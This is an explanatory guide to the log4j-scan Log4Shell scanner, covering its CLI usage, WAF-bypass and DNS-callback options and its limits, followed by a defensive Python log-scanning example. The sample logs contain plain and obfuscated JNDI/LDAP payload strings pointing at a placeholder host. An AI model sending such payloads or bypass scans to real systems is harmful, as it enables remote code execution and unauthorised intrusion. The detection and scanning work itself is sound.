log4j-scan is an automated, open-source vulnerability scanner developed by FullHunt to detect the critical Log4Shell vulnerability (CVE-2021-44228). It operates as an offensive-security style network scanner that identifies vulnerable endpoints by actively fuzzing requests and tracking Out-of-Band (OOB) DNS callbacks.

🛡️ Key Features of log4j-scan
Unlike basic detection scripts, log4j-scan was built to replicate actual attacker behavior to find exposed applications across complex environments.
Massive Header Fuzzing: Tests more than 60 different HTTP request headers (including User-Agent, X-Forwarded-For, and Referer) rather than just checking standard inputs.
Data Parameter Support: Automates payload injection into HTTP POST data and raw JSON parameters.
DNS Callback Validation: Uses platforms like interact.sh or dnslog.cn to catch successful lookups, so a recorded callback confirms the vulnerability without false positives.
WAF Bypassing: Includes modular payload variations specifically designed to sneak past weak Web Application Firewall regex protections.

🚀 Basic Usage and Syntax
The scanner is written in Python and is highly configurable. Below are the primary ways to run it via the CLI:

1. Scan a Single URL

To test a single web application using default GET request headers:

python3 log4j-scan.py -u https://example.com

2. Scan a List of Targets

To check a large list of web properties in one run, feed it a text file containing one URL per line:

python3 log4j-scan.py -l urls.txt

3. Fuzz POST Requests and Run All Tests
By default, the tool sends GET requests. You can force it to switch methods and exhaustively test every available injection point:
python3 log4j-scan.py -u https://example.com --request-type post --run-all-tests

4. Bypass WAF and Use a Custom DNS Host
If your infrastructure sits behind a firewall, use the bypass payloads combined with your own controlled DNS server to catch the callback:
python3 log4j-scan.py -u https://example.com --waf-bypass --custom-dns-callback-host my-dns-server.com

⚙️ Command-Line Arguments Overview

-u, --url                  Targets a specific single web address.
-l, --list                 Targets multiple web addresses from a loaded file.
--request-type             Sets the HTTP method (get or post); defaults to get.
--waf-bypass               Appends obfuscated payloads to bypass firewalls.
--run-all-tests            Instructs the tool to execute all permutations on each target.
--dns-callback-provider    Swaps the default tracking host (e.g., interact.sh, dnslog.cn).

⚠️ Limitations to Keep in Mind
While excellent for perimeter networks, log4j-scan has structural limitations:
Network-Only Visibility: It can only find Log4j instances tied directly to an accessible web interface. It cannot find dormant, un-executed, or offline libraries buried deep within local servers.
Requires Outbound Network Traffic: If the server is vulnerable but blocked from initiating outbound connections via firewall policies, the tool will not record a DNS call.
Alternative Tools: For deep file-system or source-code scanning, security teams rely on tools like Logpresso’s Log4j Scanner or native OS utilities.
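As an added defender-side example (not code from the log4j-scan project or from the original page), the following Python checks web access-log lines for the kind of JNDI lookup strings that the header fuzzing and WAF-bypass modes described above send, collapsing the ${lower:}, ${upper:} and ${x:-y} obfuscations before matching; unlike the scanner, it works from logs alone and needs no outbound DNS callback. The log lines and the 198.51.100.10 address are constructed for the example.

```python
import re

# Constructed sample access-log lines (not from the original page): a benign request,
# a plain JNDI probe in the User-Agent field, and an obfuscated probe of the kind a
# WAF-bypass payload set produces. 198.51.100.10 is a documentation-range address.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Dec/2021:10:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [12/Dec/2021:10:00:02 +0000] "GET /login HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.10:1389/a}"
10.0.0.9 - - [12/Dec/2021:10:00:03 +0000] "GET /api HTTP/1.1" 200 512 "-" "${${lower:j}${::-n}${lower:d}i:${lower:l}dap://198.51.100.10/x}"
"""

# Innermost lookup expression: a ${...} whose body contains no further ${ or }.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# After normalisation, any ${jndi:<scheme>:...} lookup is what we alert on.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.I)


def _resolve(m):
    """Evaluate the obfuscation lookups Log4j would, leaving everything else as-is."""
    body = m.group(1)
    if ":-" in body:                      # ${env:NOPE:-j} and ${::-j} -> "j"
        return body.split(":-", 1)[1]
    kind, sep, arg = body.partition(":")
    if sep and kind.lower() == "lower":   # ${lower:J} -> "j"
        return arg.lower()
    if sep and kind.lower() == "upper":   # ${upper:j} -> "J"
        return arg.upper()
    return m.group(0)                     # keep jndi: and unknown lookups untouched


def normalize_lookups(value):
    """Repeatedly collapse innermost lookups until the string stops changing."""
    while True:
        collapsed = _INNER.sub(_resolve, value)
        if collapsed == value:
            return value
        value = collapsed


def scan_log(text):
    """Return one finding per log line that carries a JNDI lookup after de-obfuscation."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        norm = normalize_lookups(raw)
        hit = _JNDI.search(norm)
        if hit:
            findings.append({"line": lineno, "scheme": hit.group(1).lower(),
                             "obfuscated": norm != raw})
    return findings
```

Running scan_log(SAMPLE_LOG) flags lines 2 and 3, with line 3 marked as obfuscated because its lookups had to be collapsed to reveal the jndi: prefix.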